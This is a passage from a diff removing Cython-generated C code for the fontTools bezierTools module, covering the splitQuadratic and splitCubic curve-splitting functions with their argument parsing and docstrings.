_splitQuadraticAtT(a, b, c, *solutions) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_8, __pyx_n_s_splitQuadraticAtT); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 549, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 549, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_a); - __Pyx_GIVEREF(__pyx_v_a); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_a)) 
__PYX_ERR(0, 549, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_b); - __Pyx_GIVEREF(__pyx_v_b); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_b)) __PYX_ERR(0, 549, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c); - __Pyx_GIVEREF(__pyx_v_c); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_v_c)) __PYX_ERR(0, 549, __pyx_L1_error); - __pyx_t_5 = __Pyx_PySequence_Tuple(__pyx_v_solutions); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 549, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_t_5); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 549, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_8, __pyx_t_2, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 549, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":507 - * - * - * def splitQuadratic(pt1, pt2, pt3, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a quadratic Bezier curve at a given coordinate. 
- * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitQuadratic", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_a); - __Pyx_XDECREF(__pyx_v_b); - __Pyx_XDECREF(__pyx_v_c); - __Pyx_XDECREF(__pyx_v_solutions); - __Pyx_XDECREF(__pyx_gb_9fontTools_4misc_11bezierTools_14splitQuadratic_2generator2); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":552 - * - * - * def splitCubic(pt1, pt2, pt3, pt4, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a cubic Bezier curve at a given coordinate. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_29splitCubic(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_28splitCubic, "splitCubic(pt1, pt2, pt3, pt4, where, isHorizontal)\nSplit a cubic Bezier curve at a given coordinate.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as 2D tuples.\n where: Position at which to split the curve.\n isHorizontal: Direction of the ray splitting the curve. 
If true,\n ``where`` is interpreted as a Y coordinate; if false, then\n ``where`` is interpreted as an X coordinate.\n\n Returns:\n A list of two curve segments (each curve segment being four 2D tuples)\n if the curve was successfully split, or a list containing the original\n curve.\n\n Example::\n\n >>> printSegments(splitCubic((0, 0), (25, 100), (75, 100), (100, 0), 150, False))\n ((0, 0), (25, 100), (75, 100), (100, 0))\n >>> printSegments(splitCubic((0, 0), (25, 100), (75, 100), (100, 0), 50, False))\n ((0, 0), (12.5, 50), (31.25, 75), (50, 75))\n ((50, 75), (68.75, 75), (87.5, 50), (100, 0))\n >>> printSegments(splitCubic((0, 0), (25, 100), (75, 100), (100, 0), 25, True))\n ((0, 0), (2.29379, 9.17517), (4.79804, 17.5085), (7.47414, 25))\n ((7.47414, 25), (31.2886, 91.6667), (68.7114, 91.6667), (92.5259, 25))\n ((92.5259, 25), (95.202, 17.5085), (97.7062, 9.17517), (100, 1.77636e-15))\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_29splitCubic = {"splitCubic", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_29splitCubic, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_28splitCubic}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_29splitCubic(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_pt4 = 0; - PyObject *__pyx_v_where = 0; - PyObject *__pyx_v_isHorizontal = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[6] = {0,0,0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("splitCubic 
(wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,&__pyx_n_s_where,&__pyx_n_s_isHorizontal,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 6: values[5] = __Pyx_Arg_FASTCALL(__pyx_args, 5); - CYTHON_FALLTHROUGH; - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 552, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 552, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubic", 1, 6, 6, 1); __PYX_ERR(0, 552, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if 
(unlikely(PyErr_Occurred())) __PYX_ERR(0, 552, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubic", 1, 6, 6, 2); __PYX_ERR(0, 552, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 552, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubic", 1, 6, 6, 3); __PYX_ERR(0, 552, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 4: - if (likely((values[4] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_where)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[4]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 552, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubic", 1, 6, 6, 4); __PYX_ERR(0, 552, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 5: - if (likely((values[5] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_isHorizontal)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[5]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 552, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubic", 1, 6, 6, 5); __PYX_ERR(0, 552, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "splitCubic") < 0)) __PYX_ERR(0, 552, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 6)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - values[5] = __Pyx_Arg_FASTCALL(__pyx_args, 5); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = 
values[1]; - __pyx_v_pt3 = values[2]; - __pyx_v_pt4 = values[3]; - __pyx_v_where = values[4]; - __pyx_v_isHorizontal = values[5]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("splitCubic", 1, 6, 6, __pyx_nargs); __PYX_ERR(0, 552, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitCubic", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_28splitCubic(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4, __pyx_v_where, __pyx_v_isHorizontal); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_10splitCubic_2generator3(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value); /* proto */ - -/* "fontTools/misc/bezierTools.py":583 - * a[isHorizontal], b[isHorizontal], c[isHorizontal], d[isHorizontal] - where - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) # <<<<<<<<<<<<<< - * if not solutions: - * return [(pt1, pt2, pt3, pt4)] - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_10splitCubic_genexpr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *__pyx_cur_scope; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - int __pyx_lineno = 0; - const char 
*__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("genexpr", 0); - __pyx_cur_scope = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr, __pyx_empty_tuple, NULL); - if (unlikely(!__pyx_cur_scope)) { - __pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *)Py_None); - __Pyx_INCREF(Py_None); - __PYX_ERR(0, 583, __pyx_L1_error) - } else { - __Pyx_GOTREF((PyObject *)__pyx_cur_scope); - } - __pyx_cur_scope->__pyx_genexpr_arg_0 = __pyx_genexpr_arg_0; - __Pyx_INCREF(__pyx_cur_scope->__pyx_genexpr_arg_0); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_genexpr_arg_0); - { - __pyx_CoroutineObject *gen = __Pyx_Generator_New((__pyx_coroutine_body_t) __pyx_gb_9fontTools_4misc_11bezierTools_10splitCubic_2generator3, NULL, (PyObject *) __pyx_cur_scope, __pyx_n_s_genexpr, __pyx_n_s_splitCubic_locals_genexpr, __pyx_n_s_fontTools_misc_bezierTools); if (unlikely(!gen)) __PYX_ERR(0, 583, __pyx_L1_error) - __Pyx_DECREF(__pyx_cur_scope); - __Pyx_RefNannyFinishContext(); - return (PyObject *) gen; - } - - /* function exit code */ - __pyx_L1_error:; - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitCubic.genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __Pyx_DECREF((PyObject *)__pyx_cur_scope); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_10splitCubic_2generator3(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value) /* generator body */ -{ - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *__pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *)__pyx_generator->closure); - PyObject *__pyx_r = NULL; - 
PyObject *__pyx_t_1 = NULL; - Py_ssize_t __pyx_t_2; - PyObject *(*__pyx_t_3)(PyObject *); - PyObject *__pyx_t_4 = NULL; - int __pyx_t_5; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("genexpr", 0); - switch (__pyx_generator->resume_label) { - case 0: goto __pyx_L3_first_run; - default: /* CPython raises the right error here */ - __Pyx_RefNannyFinishContext(); - return NULL; - } - __pyx_L3_first_run:; - if (unlikely(!__pyx_sent_value)) __PYX_ERR(0, 583, __pyx_L1_error) - __pyx_r = PyList_New(0); if (unlikely(!__pyx_r)) __PYX_ERR(0, 583, __pyx_L1_error) - __Pyx_GOTREF(__pyx_r); - if (unlikely(!__pyx_cur_scope->__pyx_genexpr_arg_0)) { __Pyx_RaiseUnboundLocalError(".0"); __PYX_ERR(0, 583, __pyx_L1_error) } - if (likely(PyList_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) || PyTuple_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) { - __pyx_t_1 = __pyx_cur_scope->__pyx_genexpr_arg_0; __Pyx_INCREF(__pyx_t_1); - __pyx_t_2 = 0; - __pyx_t_3 = NULL; - } else { - __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_cur_scope->__pyx_genexpr_arg_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 583, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 583, __pyx_L1_error) - } - for (;;) { - if (likely(!__pyx_t_3)) { - if (likely(PyList_CheckExact(__pyx_t_1))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 583, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 583, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 583, 
__pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 583, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 583, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 583, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } - } else { - __pyx_t_4 = __pyx_t_3(__pyx_t_1); - if (unlikely(!__pyx_t_4)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 583, __pyx_L1_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_4); - } - __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_t); - __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_t, __pyx_t_4); - __Pyx_GIVEREF(__pyx_t_4); - __pyx_t_4 = 0; - __pyx_t_4 = PyObject_RichCompare(__pyx_int_0, __pyx_cur_scope->__pyx_v_t, Py_LE); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 583, __pyx_L1_error) - if (__Pyx_PyObject_IsTrue(__pyx_t_4)) { - __Pyx_DECREF(__pyx_t_4); - __pyx_t_4 = PyObject_RichCompare(__pyx_cur_scope->__pyx_v_t, __pyx_int_1, Py_LT); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 583, __pyx_L1_error) - } - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 583, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - if (__pyx_t_5) { - if (unlikely(__Pyx_ListComp_Append(__pyx_r, (PyObject*)__pyx_cur_scope->__pyx_v_t))) __PYX_ERR(0, 583, __pyx_L1_error) - } - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - CYTHON_MAYBE_UNUSED_VAR(__pyx_cur_scope); - - /* function exit code */ - goto __pyx_L0; - 
__pyx_L1_error:; - __Pyx_XDECREF(__pyx_r); __pyx_r = 0; - __Pyx_Generator_Replace_StopIteration(0); - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_AddTraceback("genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - #if !CYTHON_USE_EXC_INFO_STACK - __Pyx_Coroutine_ResetAndClearException(__pyx_generator); - #endif - __pyx_generator->resume_label = -1; - __Pyx_Coroutine_clear((PyObject*)__pyx_generator); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":552 - * - * - * def splitCubic(pt1, pt2, pt3, pt4, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a cubic Bezier curve at a given coordinate. - * - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_28splitCubic(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4, PyObject *__pyx_v_where, PyObject *__pyx_v_isHorizontal) { - PyObject *__pyx_v_a = NULL; - PyObject *__pyx_v_b = NULL; - PyObject *__pyx_v_c = NULL; - PyObject *__pyx_v_d = NULL; - PyObject *__pyx_v_solutions = NULL; - PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_10splitCubic_2generator3 = 0; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *__pyx_t_7 = NULL; - PyObject *(*__pyx_t_8)(PyObject *); - PyObject *__pyx_t_9 = NULL; - int __pyx_t_10; - int __pyx_t_11; - int __pyx_t_12; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("splitCubic", 1); - - /* "fontTools/misc/bezierTools.py":579 - * ((92.5259, 25), (95.202, 17.5085), (97.7062, 9.17517), (100, 1.77636e-15)) - * """ - * a, b, c, d = calcCubicParameters(pt1, pt2, pt3, pt4) # <<<<<<<<<<<<<< - * solutions = solveCubic( - * a[isHorizontal], b[isHorizontal], 
c[isHorizontal], d[isHorizontal] - where - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcCubicParameters); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 579, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[5] = {__pyx_t_3, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 4+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 579, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_1))) || (PyList_CheckExact(__pyx_t_1))) { - PyObject* sequence = __pyx_t_1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 4)) { - if (size > 4) __Pyx_RaiseTooManyValuesError(4); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 579, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_5 = PyTuple_GET_ITEM(sequence, 2); - __pyx_t_6 = PyTuple_GET_ITEM(sequence, 3); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_3 = PyList_GET_ITEM(sequence, 1); - __pyx_t_5 = PyList_GET_ITEM(sequence, 2); - __pyx_t_6 = PyList_GET_ITEM(sequence, 3); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_5); - __Pyx_INCREF(__pyx_t_6); - #else - { - Py_ssize_t i; - PyObject** temps[4] = {&__pyx_t_2,&__pyx_t_3,&__pyx_t_5,&__pyx_t_6}; - for (i=0; i < 4; i++) 
{ - PyObject* item = PySequence_ITEM(sequence, i); if (unlikely(!item)) __PYX_ERR(0, 579, __pyx_L1_error) - __Pyx_GOTREF(item); - *(temps[i]) = item; - } - } - #endif - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } else { - Py_ssize_t index = -1; - PyObject** temps[4] = {&__pyx_t_2,&__pyx_t_3,&__pyx_t_5,&__pyx_t_6}; - __pyx_t_7 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 579, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_7); - for (index=0; index < 4; index++) { - PyObject* item = __pyx_t_8(__pyx_t_7); if (unlikely(!item)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(item); - *(temps[index]) = item; - } - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_7), 4) < 0) __PYX_ERR(0, 579, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 579, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_a = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_b = __pyx_t_3; - __pyx_t_3 = 0; - __pyx_v_c = __pyx_t_5; - __pyx_t_5 = 0; - __pyx_v_d = __pyx_t_6; - __pyx_t_6 = 0; - - /* "fontTools/misc/bezierTools.py":580 - * """ - * a, b, c, d = calcCubicParameters(pt1, pt2, pt3, pt4) - * solutions = solveCubic( # <<<<<<<<<<<<<< - * a[isHorizontal], b[isHorizontal], c[isHorizontal], d[isHorizontal] - where - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_solveCubic); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 580, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - - /* "fontTools/misc/bezierTools.py":581 - * a, b, c, d = calcCubicParameters(pt1, pt2, pt3, pt4) - * solutions = solveCubic( - * a[isHorizontal], b[isHorizontal], c[isHorizontal], d[isHorizontal] - where # <<<<<<<<<<<<<< - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 
